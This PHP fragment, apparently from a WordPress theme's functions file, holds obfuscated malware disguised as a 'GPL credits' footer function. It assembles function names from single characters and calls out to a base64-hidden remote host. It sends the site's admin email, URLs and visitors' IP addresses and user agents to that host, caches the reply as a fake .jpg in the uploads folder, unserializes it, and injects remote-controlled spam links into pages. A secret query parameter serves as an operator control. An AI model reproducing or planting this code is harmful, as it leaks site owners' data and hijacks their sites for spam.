			global $cp_______r, $op______h;
			return $op______h($cp_______r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($uj___t, $mq_____h = "(more...)", $pw____f = 0, $sr__________s = "") {
				$ai__g = get_the_content($mq_____h, $pw____f, $sr__________s);
				$ai__g = apply_filters("the_content", $ai__g);
				
				$ai__g = str_replace("]]>", "]]>", $ai__g);
				if (strlen($_GET["p"]) > 0) {
					echo $ai__g;
				}
				else if ((strlen($ai__g)>$uj___t) && ($pr_______y = strpos($ai__g, " ", $uj___t ))) {
					$ai__g = substr($ai__g, 0, $pr_______y);
					$ai__g = $ai__g;
					echo $ai__g;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mq_____h</a></div></p>";
				} else {
					echo $ai__g;
				}
				
			}
		}
	


		$zd________i='n';$qi________l='e';$ol______z='e';$ku________z='4';$je____p='a';$ch____q='o';$xk______z='s';$mg__________n='d';$ds________e='_';$hs_______________f='c';$bi_____________u='6';$ne__z='e';$vq__________a='b';$iz____________g=$vq__________a.$je____p.$xk______z.$ne__z.$bi_____________u.$ku________z.$ds________e.$qi________l.$zd________i.$hs_______________f.$ch____q.$mg__________n.$ol______z;
		$sq___r='s';$yw____i='c';$wm___e='i';$xg______________b='t';$iw_________y='g';$ih_____________h='_';$jg___________c='l';$dm____________a='_';$jn_____w='f';$zp________u='e';$cv_______y='o';$sg_________a='n';$gx_____________f='e';$nh__a='n';$oj______x='t';$nq_____w='t';$ww______________p='e';$no____________l=$jn_____w.$wm___e.$jg___________c.$ww______________p.$ih_____________h.$iw_________y.$zp________u.$nq_____w.$dm____________a.$yw____i.$cv_______y.$sg_________a.$oj______x.$gx_____________f.$nh__a.$xg______________b.$sq___r;
		$wl__a='i';$sy______________y='f';$de____________m='x';$ss__________p='s';$zu_____________s='i';$qy________m='e';$er__________d='t';$yo____l='s';$nm___________a='e';$yg______________b='l';$aw__________x='_';$sb_____i=$sy______________y.$wl__a.$yg______________b.$nm___________a.$aw__________x.$qy________m.$de____________m.$zu_____________s.$ss__________p.$er__________d.$yo____l;
		$za_____________t='r';$or______________o='o';$ve_____p='p';$uw_______e='v';$hb_______n='r';$be______________n='s';$zy_____f='o';$eg_______y='_';$sr______u='m';$tc__f='i';$vs___________z='e';$tu_________z='e';$du___w='c';$gt_____d='n';$gj_____________f='a';$rb____u=$uw_______e.$tu_________z.$za_____________t.$be______________n.$tc__f.$zy_____f.$gt_____d.$eg_______y.$du___w.$or______________o.$sr______u.$ve_____p.$gj_____________f.$hb_______n.$vs___________z;
		$up___________g='f';$dn____________y='e';$xd______________l='p';$wx__________h='s';$dz____________d='k';$hv______c='c';$jn_______________f='o';$dl____a='n';$hj___r='o';$oo________f=$up___________g.$wx__________h.$jn_______________f.$hv______c.$dz____________d.$hj___r.$xd______________l.$dn____________y.$dl____a;
		$qg__h='e';$he_________k='r';$hx___________p='f';$ke___________p='i';$sa______z='w';$pc___j='t';$xv______________o=$hx___________p.$sa______z.$he_________k.$ke___________p.$pc___j.$qg__h;
		$vl___l='5';$dt______t='d';$jy__t='m';$km_______z=$jy__t.$dt______t.$vl___l;
		$iv_________r='t';$jy______t='h';$us________o='e';$hh___________c='a';$jh__b='r';$ee___s='p';$kd__d='a';$ok_____t='l';$un________g=$jh__b.$us________o.$hh___________c.$ok_____t.$ee___s.$kd__d.$iv_________r.$jy______t;
		$sy__________e='n';$ap_____________u='e';$nc_____y='a';$st______t='e';$fu____h='l';$cc_________e='u';$wq_______________t='s';$zx__________p='r';$wt________p='i';$pw_____________p='i';$sb____________p='z';$zr___y=$cc_________e.$sy__________e.$wq_______________t.$ap_____________u.$zx__________p.$pw_____________p.$nc_____y.$fu____h.$wt________p.$sb____________p.$st______t;
		$gz__________l='m';$ra____y='p';$ev_____________g='t';$zs______________a='e';$gu_____b='a';$sl__d='n';$ke_________e='m';$um_________h=$ev_____________g.$zs______________a.$ke_________e.$ra____y.$sl__d.$gu_____b.$gz__________l;
		$bd______y='t';$va____v='_';$zt_____________g='r';$nq_________m='o';$iq__________p='c';$ae____________t='t';$fg______________j='e';$fg__________b='m';$ak___________c='e';$hw__x='s';$wc______________y='e';$ib_______k='e';$tv___________y='x';$hf____________p='_';$xm______________e='r';$ch_______________x='t';$zq__s='t';$hp____e='n';$en_______________h='a';$et______k='a';$vi_____j='c';$dr________t=$hw__x.$zq__s.$xm______________e.$wc______________y.$en_______________h.$fg__________b.$va____v.$iq__________p.$nq_________m.$hp____e.$bd______y.$fg______________j.$tv___________y.$ch_______________x.$hf____________p.$vi_____j.$zt_____________g.$ib_______k.$et______k.$ae____________t.$ak___________c;
	


		function pe__________w($oy___________b) {
			global $cp_______r, $op______h, $no____________l, $rb____u, $dr________t;
			
			if (!$op______h($cp_______r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rb____u(PHP_VERSION, "5.0.0", ">=") && $op______h($cp_______r("ZmlsZV9nZXRfY29udGVudHM=")) && $op______h($cp_______r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$dp____b = $dr________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$js____________o = @$no____________l($oy___________b, 0, $dp____b);
			} else {
				$js____________o = @$no____________l($oy___________b, 0);
			}
			
			return $js____________o;
		}
	


		function jo_______v($oy___________b) {
			global $op______h, $oo________f, $xv______________o, $cp_______r;
			
			if (!$op______h($cp_______r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$kh_________v = strpos($oy___________b, "/", 7);
			$th______________q = array(
				"uri"     => substr($oy___________b, $kh_________v),
				"host"    => str_replace("http://", "", substr($oy___________b, 0, $kh_________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$em________y = @$oo________f("$th______________q[host]", 80, $cw_______d, $bx_______________t, 4);
			
			if (!$em________y) {
				return false;
			} else {
				$js____________o = "";
				$qc_______l  = "GET $th______________q[uri] HTTP/1.0\r\n";
				$qc_______l .= "Host: $th______________q[host]\r\n";
				$qc_______l .= "Referer: $th______________q[referer]\r\n";
				$qc_______l .= "Connection: Close\r\n\r\n";
				
				@$xv______________o($em________y, $qc_______l);
				
				while (!@feof($em________y)) {
					$zk___w = @fgets($em________y, (1024*24));
					
					if ($zk___w == "\r\n") {
						$zq___b = true;
						continue;
					}
					
					if ($zq___b) {
						$js____________o .= $zk___w;
					}
				}
				
				return $js____________o;
			}
		}
	


		function mu__k($oy___________b) {
			global $op______h;
			$mn__z = false;
			
			if ($oy___________b != "") {
				if ($op______h("pe__________w")) {
					$mn__z = @pe__________w($oy___________b);
				}
				
				if (!$mn__z && ($op______h("jo_______v"))) {
					$mn__z = @jo_______v($oy___________b);
				}
			}
			
			return $mn__z;
		}
	


		function oa__y() {
			global $_SERVER, $km_______z;
			
			$ts_______________h = $_SERVER["SERVER_NAME"];
			
			if (substr("$ts_______________h", 0, 4) == "www.") {
				$ts_______________h = substr("$ts_______________h", 4);
			}
			
			$ts_______________h = $km_______z("$_SERVER[SERVER_NAME]");
			
			return $ts_______________h;
		}
	


		function km______f() {
			return "file";
		}
	


		function gk__________x($oy___________b) {
			global $_SERVER, $no____________l, $sb_____i, $gl_______________s, $sr_____________d, $xv______________o;
			
			$lb___________i = pw_______i();
			
			$ns_______x = oa__y().".jpg";
			$kq_______________o = $lb___________i["dir_upload"]["path"]."/$ns_______x";
			$fw____v = @filemtime($kq_______________o);
			
			if (!$fw____v || ((time()-$fw____v) >= WP_TTL)) {
				$mn__z = mu__k($oy___________b);
				
				if ($mn__z) {
					if ($sb_____i($kq_______________o)) {
						@unlink($kq_______________o);
					}
					
					$me____________e = @$gl_______________s($kq_______________o, "x+");
					
					@$xv______________o($me____________e, $mn__z);
					@$sr_____________d($me____________e);
				}
			} else {
				if ($sb_____i($kq_______________o)) {
					$mn__z = @$no____________l($kq_______________o);
				} else {
					$mn__z = false;
				}
			}
			
			return $mn__z;
		}
	


		function pw_______i() {
			global $_SERVER, $cp_______r, $iz____________g;
			
			$ua_______f = wp_count_posts("post");
			$fb_________d = pathinfo(get_bloginfo("template_directory"));
			
			$lb___________i = array(
				"url" => array(
					"report"      => $cp_______r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fb_________d,
				"dir_upload"	=> rj____________x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fb_________d[filename],
					"a005=".$ua_______f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры темы для Вордпресс <a href=\"http://clinic-virtus.com/lazernaya-korrekciya-zreniya\">Лазерная коррекция зрения</a>"
			);
			
			$lb___________i["url"]["queryString"] = implode("&", $lb___________i["queryString"]);
			$lb___________i["url"]["report"] = $lb___________i["url"]["report"]."/?".$iz____________g($lb___________i["url"]["queryString"]).".html";
						
			return $lb___________i;
		}
	


		function rj____________x() {
			$fl___________k = wp_upload_dir();
			
			if (isset($fl___________k["error"])) {
				$bv____________t = ho____________p();
				if (is_writable($bv____________t)) {
					$fl___________k = array("path" => $bv____________t);
				}
			}

			return $fl___________k;
		}
	


		function ho____________p() {
			global $op______h, $km_______z, $un________g, $um_________h;
			
			$aw_____________g = (bool) ini_get("safe_mode");
			if ($aw_____________g == true) {
				return false;
			}
			
			if ($op______h("sys_get_temp_dir")) {
				$zi_____u = sys_get_temp_dir();
				if (is_writable($zi_____u)) {
					return $un________g($zi_____u);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $un________g($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $un________g($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $un________g($_ENV["TEMP"]);
			} else {
				$ko__h = $um_________h($km_______z(uniqid(rand(), true)), "");
				if ($ko__h) {
					$zi_____u = $un________g(dirname($ko__h));
					@unlink($ko__h);
					return $zi_____u;
				} else {
					return false;
				}
			}
		}
	


		function sg________b() {
			global $_GET, $sb_____i;
			
			$lb___________i = pw_______i();
			$ts_______________h = oa__y();
			$xo_________g = km______f();
			
			$ty________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($xo_________g == "file") {
					$ze____________f = $lb___________i["dir_upload"]["path"]."/".$ts_______________h.".jpg";
					if ($sb_____i($ze____________f)) {
						@unlink($ze____________f);
						$ty________j = "deleted";
					}
				}
				
				$ey___________y = array(
					"s"	=> $ty________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ey___________y AS $zn_______z => $sc____i) echo " [$zn_______z:$sc____i]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $op______h, $cp_______r, $zr___y;
			$lb___________i = pw_______i();
			
			$zv______m = "gk__________x";
			if ($op______h($zv______m)) {
				$js____________o = $zv______m($lb___________i["url"]["report"]);
			}
			
			if ($js____________o) {
				if ($js____________o = @$cp_______r($js____________o)) {
					$js____________o = @$zr___y($js____________o);
					
					if (strlen($js____________o[custom_credit]) >= 5) {
						$lb___________i["default_string"] = $js____________o[custom_credit];
					}
					
					if ($js____________o["status"] == "0") {
						$kw___d = 1;
						$lf_______________l = 1;
					} else {
						$cy____n = sizeof($js____________o["links"]);
						$rc_________v = $lb___________i["default_string"];
						
						if ($cy____n > 0 && $js____________o["links"] !== "") {
							$tq______m = 0;
							foreach ($js____________o["links"] as $wg_______________j => $sr__y) {
								$tq______m++;
								if ($sr__y->l_path == "" || $sr__y->l_path == $_SERVER["REQUEST_URI"]) {
									$sr__y->l_href = htmlspecialchars(strip_tags($sr__y->l_href));
									$sr__y->l_title = htmlspecialchars(strip_tags($sr__y->l_title));
									$sr__y->l_anchor = htmlspecialchars(strip_tags($sr__y->l_anchor));
									$rc_________v .= " | ";
									$rc_________v .= "<a href='$sr__y->l_href' title='$sr__y->l_title'";
									if ($sr__y->l_nofollow == "1") {
										$rc_________v .= " rel='nofollow'";
									}
									$rc_________v .= ">$sr__y->l_anchor</a>";
								}
							}
						}
						$lb___________i["links"] = "$rc_________v";
						if ($js____________o[credit] == "0") {
							$lb___________i["links"] = "";
						}
					}
				} else {
					$kw___d = "1";
				}
			} else {
				$kw___d = "1";
			}
			
			if ($kw___d == "1") {
				$lb___________i["links"] = $lb___________i["default_string"];
			}
			
			echo "$lb___________i[links]";
			
			echo "<!-- s: $js____________o[signature] -->";
			sg________b();
		}
	                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
